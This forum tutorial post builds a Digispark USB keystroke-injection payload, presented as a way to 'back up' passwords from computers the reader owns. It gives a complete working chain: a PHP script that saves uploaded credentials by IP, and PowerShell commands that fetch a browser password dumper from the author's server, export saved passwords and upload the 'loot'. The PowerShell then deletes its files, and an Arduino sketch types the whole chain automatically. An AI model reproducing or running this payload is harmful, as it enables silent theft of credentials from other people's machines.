Pointless chapter

Since a lot of people liked my “1$ USB Rubber Ducky alternative” tutorial, I would like to make more “Payload threads” so that the people who missed the original thread could see this and get interested in developing keystroke injection scripts.

Okay okay, I’ll do another one.

Introduction

So imagine you own a lot of computers and you have different passwords saved on them, one day you decided to move all of your passwords to one place. To do this you would need to go to every computer, download a program, export the passwords and upload them to a flash drive or something.
Well today pikami has a solution for you!
Let’s make a script that does all those things auto-magically!
For the purpose of this tutorial I will not go trough setting up the Digispark dev environment, for that take a look at 1$ USB Rubber Ducky alternative

What exactly are we going to do?

• Setup our web server to save incoming passwords
• Write a script that:
  • Downloads a password recovery tool
  • Uses the tool to export browser passwords
  • Uploads exported passwords back to our server

What you’ll need

• Digispark
• Arduino software
• Web server

The process

Setting up the web server

I’ll assume you already have appache/nginx with php running on your server.
First you have to upload the password recovery tool to your server, for this tutorial we’ll be using WebBrowserPassView by NirSoft (link will be in the bottom of the post)
I downloaded it, named it pw.exe and placed it in the root directory of the server
Let’s create a directory for our password exports

mkdir log

Now let’s make a php upload script that saves all the data it gets to a file:

<?php
  $file = "log/" . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
  file_put_contents($file, file_get_contents("php://input"));
?>

I copied this script from a Hak5 tutorial (link will be in the bottom ot the post)
The server is now set up

Writing the script for Digispark

Okay so the first thing we need to do is write a powershell script that does what we need So at first the script should go somewhere that it wouldn’t bother the user: windows TEMP directory is a great place

$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir

Then it should create it’s own directory so that it would be easy to clean up after ourselves: “pw” is a perfect name

mkdir pw
cd pw

Now the script shoud download the password recovery tool from our server and use it to export the passwords (the ”| Out-Null” will force the powershell to wait till the execution is finished)

Invoke-WebRequest "https://YOUR_SERVER/f/pw.exe" -OutFile "pw.exe" | Out-Null
.\pw.exe /scomma pw.txt | Out-Null

Then it should upload the loot to our server

Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null

Let’s clean up after ourselves shal we

cd ..
Remove-Item pwd -recurse

Now that we have our script let’s program the Digispark to execute it

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);
  
  // Open powershell
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  
  // Execute code from the interwebs
  DigiKeyboard.print("$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;Invoke-WebRequest \"https://YOUR_SERVER/pw.exe\" -OutFile \"pw.exe\" | Out-Null;.\\pw.exe /scomma pw.txt | Out-Null;Invoke-RestMethod -Uri \"https://YOUR_SERVER/upload.php\" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  while(true){
    //do nothing
  }
}

You have done it

Congratulations! You can now backup the passwords from all those computers you own!
If everything is done correctly your exported passwords should be located on your servers, let’s look at what I got:

Sorry if you wanted to see more, I don’t save passwords in browsers

Final notes

So @KuhakuWolf I hope your happy.
On the real note, I hope you all learned something from this and start developing your own payloads.
I would love to see your creations and as always, if you have any questions just ask, I’ll be happy to help.

External links

• https://www.nirsoft.net/password_recovery_tools.html
• https://www.hak5.org/blog/15-second-password-hack-mr-robot-style